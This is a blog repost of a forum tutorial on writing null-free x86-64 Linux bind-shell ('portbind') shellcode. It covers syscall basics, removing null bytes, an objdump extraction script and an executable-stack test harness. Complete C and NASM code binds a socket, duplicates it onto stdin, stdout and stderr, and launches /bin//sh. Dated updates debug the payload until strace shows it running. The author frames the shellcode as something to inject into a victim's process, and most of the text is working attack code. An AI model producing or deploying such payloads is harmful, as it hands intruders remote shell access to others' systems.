Due to the lack of available information on this topic, I've decided to re-post this on my blog; it's something I'd like to be able to look back on if I need it:
Before writing this, I thought to myself that because I had worked really hard on this (give or take two weeks of constant hammering), I had opened doors that were previously closed to me as time passed and things changed. But I am convinced that without what this community stands for, and without someone there to guide me on this journey, I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently: creating shellcode for a portbind attack. The difference between what is commonly used to make it and my version is that mine follows a more logical and concise method. To preface this, I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I am also trusting that this post stays within the Soldierx community; I strongly support this community and hope its members benefit from this information.
If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...
A lot of sources on shellcode and assembly tend to be outdated, and that is the biggest obstacle when reading something like The Shellcoder's Handbook; oftentimes the techniques shown don't work as written. Much of that material targets 32-bit x86, and x86-64 Linux differs in ways that matter here: system calls are made with the syscall instruction instead of int 0x80, they use different syscall numbers, and arguments are passed in rdi, rsi, rdx, r10, r8 and r9 instead of ebx, ecx, edx, esi, edi and ebp. Why shellcode? Because shellcode can be injected into a running process on the victim's machine; how to do this, I'll save for another time. The first thing you can start with is a simple Hello World in C:
int main(int argc, char **argv)
{
    write(1, "Hello, World!", 13); // fd 1 = stdout, 13 = length of "Hello, World!"
    return 0;
}
Now if you copy this, compile it with gcc and run the resulting a.out file, you'll get the infamous hello world. But what you should be asking is: why did I write it like this, with no headers included or anything? The reason is that I'm calling write(), a thin C library wrapper around the write system call, instead of printf(). printf() is a formatting function provided by the C library (glibc on Ubuntu), not by the compiler; it builds the string and eventually calls write() itself. (Older gcc versions accept the missing header with an implicit-declaration warning; newer ones such as GCC 14 treat it as an error, in which case add #include <unistd.h>.) Each syscall is identified by a number, and 32-bit and 64-bit x86 use different numbering: on x86-64 Linux, write is 1 and exit is 60. On Ubuntu, which is what I'm using, the 64-bit numbers live in a header named unistd_64.h. To find out where it is, use the find command and then print it with cat:
find /usr/include -name unistd_64.h
cat <what you get here>
You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
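To check these numbers from C before touching assembly, glibc's syscall() function invokes a system call by number, and <sys/syscall.h> provides the SYS_* constants. A minimal sketch, assuming x86-64 Linux with glibc; the helper name raw_write is hypothetical:

```c
#define _GNU_SOURCE          /* make sure syscall() is declared */
#include <string.h>
#include <sys/syscall.h>     /* SYS_write, SYS_exit */
#include <unistd.h>          /* syscall() */

/* Hypothetical helper: write a string to stdout by syscall number,
   skipping both printf() and the write() wrapper. */
long raw_write(const char *s)
{
    /* SYS_write is 1 on x86-64 Linux: the same value the assembly
       version below loads into rax. */
    return syscall(SYS_write, 1, s, strlen(s));
}
```

Calling raw_write("Hello, World!\n") should print the string and return 14, the number of bytes written.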
So let's use what we know to write our hello world program in assembly, using the write syscall:
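section .data
msg db "hello, world!" ;13 bytes; write takes a length, so no terminator is needed
section .text
global _start
_start:
mov rax, 1 ;syscall 1 = write
mov rdi, 1 ;fd 1 = stdout
mov rsi, msg ;address of the string
mov rdx, 13 ;number of bytes to write
syscall
mov rax, 60 ;syscall 60 = exit
mov rdi, 0 ;exit status 0
syscall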
Use nasm to assemble it and ld to link the resulting object file:
nasm -f elf64 -g hello.asm
ld -o hello hello.o
./hello
This should print "hello, world!". Then you can run objdump on it to disassemble the machine code that makes up our shellcode:
$objdump -d hello
hello: file format elf64-x86-64
Disassembly of section .text:
00000000004000b0 <_start>:
4000b0: b8 01 00 00 00 mov $0x1,%eax
4000b5: bf 01 00 00 00 mov $0x1,%edi
4000ba: 48 be d8 00 60 00 00 movabs $0x6000d8,%rsi
4000c1: 00 00 00
4000c4: ba 0d 00 00 00 mov $0xd,%edx
4000c9: 0f 05 syscall
4000cb: b8 3c 00 00 00 mov $0x3c,%eax
4000d0: bf 00 00 00 00 mov $0x0,%edi
4000d5: 0f 05 syscall
^ shellcode ^
The problem with this shellcode is that it contains too many null bytes (0x00). Shellcode is usually delivered through string-handling code such as strcpy(), which treats 0x00 as the end of the string, so everything after the first null byte gets cut off and the payload never arrives intact. I should also add that shellcode is simply the raw machine-code bytes that the processor executes. For example, take the first mov instruction:
\xb8\x01\x00\x00\x00 ---in binary---> 1011 1000 0000 0001 0000 0000 0000 0000 0000 0000 ---to the processor---> \xb8 means "move a 32-bit immediate into eax" (writing eax also zeroes the upper 32 bits of rax), and the four bytes after it, \x01\x00\x00\x00, are the value 0x1 stored in little-endian order.
The extra 00s you see are there because that immediate is always encoded as a full 32-bit value (and for the movabs that loads the address of msg, a full 64-bit value), even though 0x1 fits in a single byte, which leads me to show you this:
https://imgur.com/a/rWUz75J
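To see concretely what a null byte does to a payload, here is a small sketch that finds the first 0x00 in a byte buffer and reports how many bytes a strcpy()-style copy would carry over. The helper names first_null and bytes_surviving_strcpy are hypothetical:

```c
#include <stddef.h>
#include <string.h>

/* Return the index of the first 0x00 byte in buf, or -1 if there is none. */
long first_null(const unsigned char *buf, size_t len)
{
    const unsigned char *p = memchr(buf, 0x00, len);
    return p ? (long)(p - buf) : -1;
}

/* Number of bytes a strcpy()-style copy would carry over:
   everything before the first null byte. */
size_t bytes_surviving_strcpy(const unsigned char *buf, size_t len)
{
    long i = first_null(buf, len);
    return i < 0 ? len : (size_t)i;
}
```

For mov eax, 1 (b8 01 00 00 00) only the first two bytes survive, while mov al, 1 (b0 01) passes through intact.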
There are four common ways to get rid of null bytes; after explaining them, I will show you how the first three are done:
1-push the value onto the stack and pop it into the register
2-move the value into the lowest 8 bits (1 byte) of the register, such as al or dil, after zeroing the whole register with xor
3-use the jmp/call/pop trick to get the address of data such as a string
4-for strings, encode the ASCII characters as hex values and load them into the appropriate registers
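Technique 4 comes down to packing up to eight ASCII characters into a single 64-bit immediate in little-endian order, so the first character ends up at the lowest address once the register is pushed. A small sketch under that assumption; pack_le64 and has_zero_byte are hypothetical helper names:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pack up to 8 ASCII characters into a 64-bit value,
   first character in the lowest byte (x86-64 is little-endian). */
uint64_t pack_le64(const char *s)
{
    uint64_t v = 0;
    size_t n = strlen(s);
    if (n > 8)
        n = 8;                                  /* one register holds 8 bytes */
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}

/* Returns 1 if any of the 8 bytes is zero, i.e. the mov immediate
   would contain a null byte. */
int has_zero_byte(uint64_t v)
{
    for (int i = 0; i < 8; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}
```

pack_le64("/bin//sh") gives 0x68732f2f6e69622f, the immediate used for execve later in this post. "/bin/sh" alone is only 7 bytes, so its top byte would be 0x00.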
And here's our hello world without all the null bytes:
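global _start
section .text
_start:
jmp short data ;3-jump forward to the call that sits right before msg
shellcode:
xor rax,rax ;zero the registers with xor (no null bytes)
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
mov al, 1 ;2-moving into lowest byte of register (syscall 1 = write)
push byte 1 ;1-pushing the value onto the stack
pop rdi ;1-and then popping it (fd 1 = stdout)
pop rsi ;3-popping the address of msg, pushed by call as its return address
mov dl, 13 ;2-moving into lowest byte of register (13 bytes)
syscall
mov al, 60 ;2-syscall 60 = exit (write returned 13, so the upper bytes of rax are already 0)
mov dil, 1 ;2-exit status 1
syscall
data:
call shellcode ;3-pushes the address of msg, then jumps back
msg db "Hello, World!"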
Now compile it like before and objdump it:
$ objdump -d hello
hello: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 1d jmp 40009f <data>
0000000000400082 <shellcode>:
400082: 48 31 c0 xor %rax,%rax
400085: 48 31 ff xor %rdi,%rdi
400088: 48 31 f6 xor %rsi,%rsi
40008b: 48 31 d2 xor %rdx,%rdx
40008e: b0 01 mov $0x1,%al
400090: 6a 01 pushq $0x1
400092: 5f pop %rdi
400093: 5e pop %rsi
400094: b2 0d mov $0xd,%dl
400096: 0f 05 syscall
400098: b0 3c mov $0x3c,%al
40009a: 40 b7 01 mov $0x1,%dil
40009d: 0f 05 syscall
000000000040009f <data>:
40009f: e8 de ff ff ff callq 400082 <shellcode>
00000000004000a4 <msg>:
4000a4: 48 rex.W
4000a5: 65 6c gs insb (%dx),%es:(%rdi)
4000a7: 6c insb (%dx),%es:(%rdi)
4000a8: 6f outsl %ds:(%rsi),(%dx)
4000a9: 2c 20 sub $0x20,%al
4000ab: 57 push %rdi
4000ac: 6f outsl %ds:(%rsi),(%dx)
4000ad: 72 6c jb 40011b <msg+0x77>
4000af: 64 fs
4000b0: 21 .byte 0x21
And it's free of null bytes!
Now all you have to do is extract and test the shellcode. To do this, I made a simple bash script out of a one-liner written by someone else on the internet that pulls the opcode bytes out of the objdump output. Save it to a file and chmod +x it so that it becomes an executable script:
#!/bin/bash
PROGRAM=$1
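# objdump prints up to 7 opcode bytes per line, so keep 7 space-separated fields;
# with -f1-6 the 7th byte of long instructions (such as movabs) is silently dropped
objdump -d "./${PROGRAM}"|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'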
Then run it on the hello program to get:
$ ./extract-shell hello
"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"
Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):
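int main(int argc, char **argv)
{
    // Kept on the stack so that -z execstack makes it executable
    // (same bytes as the extract-shell output above)
    unsigned char code[] = "\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";
    int (*func)(void) = (int (*)(void)) code;
    func(); // the shellcode calls exit itself, so this never returns
    return 0;
}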
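Compile this code and run it like so. -z execstack is a linker option that marks the stack as executable, and -fno-stack-protector turns off stack canaries (if you would rather set the executable-stack flag on an existing binary, the separate execstack tool can be installed on Ubuntu using sudo apt install execstack):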
$gcc -fno-stack-protector -z execstack test.c
$./a.out
Hello, World!
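If a harness like this crashes with a segmentation fault before printing anything, one likely cause on newer kernels is that the bytes sit in memory that is not executable (since Linux 5.8, an executable stack no longer makes every readable mapping executable on x86-64). A sketch of an alternative that does not depend on execstack: copy the bytes into a page from mmap(), then flip it to read+execute with mprotect(). It assumes x86-64 Linux, and run_code is a hypothetical name:

```c
#define _DEFAULT_SOURCE      /* MAP_ANONYMOUS */
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: copy len bytes of machine code into a fresh page,
   mark it read+execute, and call it as a function returning int.
   Returns -1 if the page could not be set up. */
int run_code(const unsigned char *code, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || len > (size_t)page)
        return -1;

    /* Start with a writable, non-executable mapping. */
    void *mem = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);

    /* Make it executable (and no longer writable) before jumping in. */
    if (mprotect(mem, (size_t)page, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, (size_t)page);
        return -1;
    }

    int (*func)(void) = (int (*)(void))mem;
    int result = func();     /* shellcode that calls exit never returns here */
    munmap(mem, (size_t)page);
    return result;
}
```

For a quick sanity check, the bytes b8 2a 00 00 00 c3 (mov eax, 42; ret) should return 42; the hello world shellcode prints and exits instead of returning.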
So now that you know how to write shellcode, the next step is getting it to do something useful, like port binding. The theory is very simple: your shellcode binds a socket to an IP address and port, listens for and accepts a connection, and then duplicates the client socket onto your stdin, stdout, and stderr file descriptors (0, 1 and 2). That way, when you execute a write syscall on stdout, for example, the output goes to the client socket instead of the terminal.
1) the victim becomes a server <--- you (the hacker) connect to the victim running this shellcode
2) you use an execve syscall to start a shell, whose input and output now go over the socket
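The dup2() redirection is easy to try without any networking. A minimal sketch with a pipe standing in for the client socket, assuming a POSIX system; redirect_stdout_demo is a hypothetical name:

```c
#include <string.h>
#include <unistd.h>

/* Hypothetical demo: temporarily point fd 1 (stdout) at the write end of a
   pipe, write to fd 1, then read the bytes back from the pipe. The portbind
   code does the same with the client socket in place of the pipe.
   Returns the number of bytes read back, or -1 on error. */
ssize_t redirect_stdout_demo(char *buf, size_t bufsize)
{
    const char *msg = "hi via fd 1";
    size_t len = strlen(msg);
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    int saved_stdout = dup(1);              /* keep a copy of the real stdout */
    ssize_t written = -1;
    if (saved_stdout >= 0 && dup2(fds[1], 1) == 1) {
        written = write(1, msg, len);       /* lands in the pipe, not the terminal */
        dup2(saved_stdout, 1);              /* put the real stdout back */
    }
    if (saved_stdout >= 0)
        close(saved_stdout);
    close(fds[1]);                          /* no writers left: read() sees EOF after the data */

    ssize_t n = -1;
    if (written == (ssize_t)len)
        n = read(fds[0], buf, bufsize);
    close(fds[0]);
    return n;
}
```

The write() call never touches the terminal; everything written to fd 1 comes back out of the pipe, which is exactly what happens to the shell's output once fd 1 is the client socket.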
Here's the C code I wrote for it; in this case I'm using my private IP, 192.168.1.16, and port 1234 as the target:
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdio.h>
int main()
{
    // Create the socket (man socket)
    // AF_INET for IPv4
    // SOCK_STREAM for TCP connection
    int host_sock = socket(AF_INET, SOCK_STREAM, 0);
    // Create sockaddr_in struct (man 7 ip), zeroed so that sin_zero is all zeros
    struct sockaddr_in host_addr = {0};
    host_addr.sin_family = AF_INET;
    host_addr.sin_port = htons(1234);
    host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
    // Bind address to socket (man bind)
    bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
    // Use the created socket to listen for connections (man listen)
    listen(host_sock, 0);
    // Accept connections (man 2 accept), use NULLs to not store connection information from peer
    int client_sock = accept(host_sock, NULL, NULL);
    // Redirect stdin, stdout, stderr to client
    dup2(client_sock, 0);
    dup2(client_sock, 1);
    dup2(client_sock, 2);
    // Execute /bin/sh (man execve)
    execve("/bin/sh", NULL, NULL);
}
When you compile and run this, it stands by until the hacker connects to it. In this case I'm going to connect to the victim using netcat, a program that comes with most Linux systems:
$nc 192.168.1.16 1234
echo hello!
hello!
id
uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)
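Before translating the struct into assembly, it helps to see the exact bytes a filled-in sockaddr_in holds in memory, since that is what the assembly has to reproduce. A sketch assuming Linux on a little-endian x86-64 machine; dump_sockaddr is a hypothetical helper:

```c
#include <arpa/inet.h>    /* htons(), inet_addr() */
#include <netinet/in.h>   /* struct sockaddr_in */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

_Static_assert(sizeof(struct sockaddr_in) == 16, "sockaddr_in should be 16 bytes");

/* Hypothetical helper: fill a sockaddr_in the way the C portbind code does,
   copy its 16 raw bytes into out and print them as hex. */
void dump_sockaddr(const char *ip, uint16_t port, unsigned char out[16])
{
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);          /* sin_zero padding is all zeros */
    addr.sin_family = AF_INET;              /* 2, stored in host (little-endian) order */
    addr.sin_port = htons(port);            /* network (big-endian) order */
    addr.sin_addr.s_addr = inet_addr(ip);   /* already in network order */
    memcpy(out, &addr, sizeof addr);

    for (size_t i = 0; i < sizeof addr; i++)
        printf("%02x ", out[i]);
    printf("\n");
}
```

For ("192.168.1.16", 1234) this prints 02 00 04 d2 c0 a8 01 10 followed by eight 00 bytes: the family as a little-endian word, the port 0x04d2 in big-endian order (which is why NASM's little-endian dw has to be written as 0xd204), then the address bytes c0 a8 01 10, which read back as the little-endian dword 0x1001A8C0.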
Writing the shellcode for this is harder than writing the assembly for it. What distinguishes this post from anything else available in the 4% of the internet that we can see is that I used a C-style struct in the assembly (no C involved, I promise) and made the syscalls in a logical order that mirrors the C code above, using no fancy assembly instructions or tricks for filling in the blanks:
segment .data
;struct sockaddr_in host_addr;
;host_addr.sin_family = AF_INET;
;host_addr.sin_port = htons(1234);
;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
struc sockaddr_in
sin_family resw 1 ;allocate 2 bytes
sin_port resw 1 ;allocate 2 bytes
sin_addr resd 1 ;allocate 4 bytes (for 32 bit address)
sin_zero resb 8 ;allocate 8 bytes (for the 0 padding)
endstruc
host_addr istruc sockaddr_in
at sin_family, dw 0x02
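at sin_port, dw 0xd204 ;port 1234 = 0x04d2; dw stores 0xd204 as bytes 04 d2, i.e. network (big-endian) byte order
at sin_addr, dd 0x1001A8C0 ;address 192.168.1.16, stored as bytes c0 a8 01 10
at sin_zero, db 0
iend
msg db "got here", 0
bin db "/bin/sh", 0 ;execve needs a null-terminated path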
segment .text
global _start
_start:
;sock= socket(AF_INET, SOCK_STREAM, 0)
mov rax,41 ;syscall 41 = socket
mov rdi,2 ;AF_INET = 2, SOCK_STREAM = 1; I got these values from the socket.h header files (use find /usr/include -name socket.h to find them)
mov rsi,1
xor rdx,rdx ;protocol 0
syscall
mov rbx,rax ;save the fd!
;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,49 ;load the syscall value for bind
mov rdi,rbx ;load the file descriptor we saved earlier
mov rsi,host_addr ;load the address of the struct
mov rdx,16 ;the size is 16 bytes
syscall
cmp rax,0 ;a negative return value means bind failed
jl exit
;listen(host_sock, 0);
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,50 ;load the syscall value for listen
mov rdi,rbx ;load the file descriptor
syscall
;int client_sock = accept(host_sock, NULL, NULL);
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,43 ;load the syscall value for accept
mov rdi,rbx ;load the file descriptor
syscall
mov rcx,rax ;save the client file descriptor (syscall overwrites rcx, so after the first dup2 the fd lives on in rdi)
;duplicate the file descriptors into stdin, stdout,stderr
xor rax,rax
xor rdi,rdi
xor rsi,rsi
mov rax, 33
mov rdi, rcx
mov rsi,0 ;newfd 0 = stdin
syscall
xor rax,rax
mov rax, 33
mov rsi, 1
syscall
xor rax,rax
mov rax, 33
mov rsi, 2
syscall
;and finally execute /bin/sh
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rax,59
mov rdi,bin
syscall
;print got here (for debugging purposes)
xor rax, rax
mov rax,1
xor rdi, rdi
mov rdi,1
xor rsi,rsi
mov rsi, msg
mov rdx, 8
syscall
exit:
;exit
xor rax,rax
mov rax,60
xor rdi,rdi
syscall
If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly
The key is knowing that the sockaddr_in struct is 16 bytes long: 2 bytes of family, 2 of port, 4 of address and 8 of zero padding. If your struct layout is off, the port and address won't be filled in properly, and if you pass bind() a length shorter than 16, Linux rejects it with EINVAL. After that, the rest is just filling in the blanks for the individual syscalls. As you write this, you can use the strace program to see how each syscall is being filled out, keeping in mind that 1) return values go into rax, and 2) every syscall has a return value:
$ strace -e socket,bind,listen,accept,dup2 ./portbindasm
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
listen(3, 0) = 0
accept(3, NULL, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
----should pause here if everything goes smoothly---
+++ exited with 0 +++
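The length passed to bind() is checked by the kernel: on Linux, an AF_INET address shorter than sizeof(struct sockaddr_in), 16 bytes, should be rejected with EINVAL. A small sketch to try it; bind_with_len is a hypothetical helper, and it binds to 0.0.0.0 with port 0 (the kernel picks a free port) rather than the address used in this post:

```c
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: bind a fresh TCP socket to 0.0.0.0, port 0,
   passing len as the address length.
   Returns 0 on success, otherwise the errno value left by socket()/bind(). */
int bind_with_len(socklen_t len)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return errno;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(0);                /* any free port */
    addr.sin_addr.s_addr = htonl(INADDR_ANY);

    int err = 0;
    if (bind(fd, (struct sockaddr *)&addr, len) != 0)
        err = errno;
    close(fd);
    return err;
}
```

bind_with_len(16) should return 0 and bind_with_len(15) should return EINVAL, which is also what strace would show as the syscall's return value when the length is wrong.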
And with that, I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time, thanks for reading!
-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------
So I have to admit that before testing this, I had a working theory that my assembly code would still work with the null bytes removed, and after writing my null-free iteration of it, it did. Then a new problem arose: when I inserted the shellcode into the C test code, strace showed a lot of garbage values, and the address structure and the other arguments were not filled out correctly during execution. For instance,
the socket and bind syscalls would turn out as:
socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]
bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1
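The most likely culprit is that the first version referenced host_addr, msg and bin by their absolute addresses in the original binary's .data section; once only the code bytes are copied into another program, those addresses point at unrelated memory. So I went ahead and did things the traditional way: instead of defining the sockaddr_in structure in a data section, I pushed its values onto the stack and moved the stack pointer into the register that holds the struct pointer for bind() (rsi), as shown below: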
segment .text
global _start
_start:
;sock= socket(AF_INET, SOCK_STREAM, 0)
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
xor rdx,rdx
syscall
mov rbx,rax ;save the fd!
;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
mov al,49 ;load the syscall value for bind
mov dil,bl ;load the file descriptor we saved earlier
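;build the sockaddr_in struct on the stack, last field first
push dword 0x1001A8C0;push my ip address onto the stack (in 64-bit mode this pushes 8 bytes: c0 a8 01 10 00 00 00 00)
push word 0xd204 ;push my port onto the stack (2 bytes)
push word 2 ;push the value for AF_INET (2 bytes)
mov rcx,rsp ;rsp now points at the start of the struct; copy it into rcx
mov rsi,rcx ;move rcx into the second argument of bind()
mov dl,16 ;the size is 16 bytes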
syscall
;listen(host_sock, 0);
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov al,50 ;load the syscall value for listen
mov dil,bl ;load the file descriptor
syscall
;int client_sock = accept(host_sock, NULL, NULL);
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov al,43 ;load the syscall value for accept
mov dil,bl ;load the file descriptor
syscall
mov cl,al ;save the client file descriptor (syscall overwrites rcx, so the dup2 calls below rely on rdi keeping it)
;duplicate the file descriptors into stdin, stdout,stderr
xor rax,rax ;zero out the argument registers
xor rdi,rdi
xor rsi,rsi
mov al, 33
mov dil, cl
syscall
xor rax,rax
mov al, 33
mov sil, 1
syscall
xor rax,rax
mov al, 33
mov sil, 2
syscall
;finally execute execve (where the problem is)
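xor rax,rax
push rax ;8 zero bytes: the null terminator for the string
xor rdx,rdx ;envp = NULL
xor rsi,rsi ;argv = NULL
mov rbx,0x68732f2f6e69622f ;"/bin//sh" in little-endian order
push rbx
push rsp
pop rdi ;rdi = pointer to "/bin//sh"
mov al,0x3b ;syscall 59 = execve
syscall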
;exit
xor rax,rax
mov al,60
xor rdi,rdi
syscall
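Why does pushing the fields in reverse order produce a valid struct? The stack grows toward lower addresses, so the last value pushed ends up first in memory. A small C simulation of that, assuming the usual x86-64 behavior that pushing a 32-bit immediate stores 8 bytes (sign-extended) while push word stores 2; sim_stack, sim_push and build_sockaddr_on_stack are hypothetical names:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the x86-64 stack: grows toward lower
   addresses, values stored little-endian. */
struct sim_stack {
    unsigned char mem[64];
    size_t sp;                              /* index of the current top */
};

static void sim_push(struct sim_stack *s, uint64_t value, size_t width)
{
    s->sp -= width;                         /* like rsp: move down first... */
    for (size_t i = 0; i < width; i++)      /* ...then store, low byte first */
        s->mem[s->sp + i] = (unsigned char)(value >> (8 * i));
}

/* Replays the three pushes from the bind() section and copies the
   12 bytes starting at the final stack pointer into out. */
void build_sockaddr_on_stack(unsigned char out[12])
{
    struct sim_stack s;
    memset(s.mem, 0xcc, sizeof s.mem);      /* 0xcc stands for older stack contents */
    s.sp = sizeof s.mem;
    sim_push(&s, 0x1001A8C0, 8);            /* push dword: positive, so upper 4 bytes are 0 */
    sim_push(&s, 0xd204, 2);                /* push word 0xd204 */
    sim_push(&s, 2, 2);                     /* push word 2 (AF_INET) */
    memcpy(out, &s.mem[s.sp], 12);
}
```

The 12 bytes come out as 02 00 04 d2 c0 a8 01 10 00 00 00 00, matching the start of the struct built in C; the last 4 bytes of sin_zero are simply whatever was already on the stack (the 0xcc filler in this model).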
After extracting the shellcode for this and putting it into the C test code, the problem turned out to be in the execve call: what should be "/bin//sh" turns into "/bin/shS", meaning one byte is getting in the way of this finally executing:
$ strace -e socket,bind,accept,dup2,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
accept(3, NULL, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/shS", NULL, NULL) = -1 ENOENT (No such file or directory) <------------problem
^
I have tried a lot of the fixes spread around the internet, and at this point I'm thinking it could be Ubuntu. If you find anything that makes it work, feel free to reply; until I can figure out how to fix this, all I can do is apologize and keep looking for a solution.
-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
AT LAST, I have found the persistent problem with my code: execve was getting the wrong data from the shellcode. What puzzled me was that whenever I tried published solutions to the execve problem, rewrote the exact same x64 code, and ran it the way I showed in this tutorial, execve still ended up with a broken version of "/bin/sh". So I tried copying and pasting the shellcode from a post on Exploit DB directly, and it worked; the author had also posted the objdump of the execve binary alongside it! Then it hit me: what if my shellcode wasn't being extracted correctly this whole time? That was exactly the case. Here, I'll show you:
$ objdump --disassemble execve
execve: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor %rax,%rax
400083: 50 push %rax
400084: 48 31 d2 xor %rdx,%rdx
400087: 48 31 f6 xor %rsi,%rsi
40008a: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
400091: 2f 73 68
400094: 53 push %rbx
400095: 54 push %rsp
400096: 5f pop %rdi
400097: b0 3b mov $0x3b,%al
400099: 0f 05 syscall
$ ./extract-shell execve
"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
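^ If you notice, after \x6e\x2f there should be another \x2f. The movabs instruction is 10 bytes long, so objdump splits it across two lines (7 bytes, then 3), and the cut -f1-6 -d' ' step in the original version of the extraction script keeps only the first six bytes of each line, silently dropping the 7th. The movabs then swallowed the next byte, 0x53 (the opcode of push rbx), into its 8-byte immediate, which is most likely where the stray "S" in "/bin/shS" came from. Using cut -f1-7 -d' ' in the script avoids this.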
The idea behind the execve shellcode using either "//bin/sh" or "/bin//sh" is that "/bin/sh" is only 7 bytes, while the version with an extra slash is exactly 8, so the whole path fits in one 64-bit register and one push with no null byte inside the immediate; the terminating null comes from the push rax just before it. This does not depend on the CPU vendor: I use an AMD FX 4300 processor, but in 64-bit mode every push and pop moves 8 bytes (64 bits) on both AMD and Intel processors. As for our little "typo", Linux path resolution treats repeated slashes as a single slash, so "/bin//sh" still runs /bin/sh. To fix this problem, you can simply add the extra \x2f, and testing the resulting shellcode then gives:
$ strace -e socket,dup2,accept,bind,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
accept(3, NULL, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("//bin/sh", NULL, NULL) = 0
Success!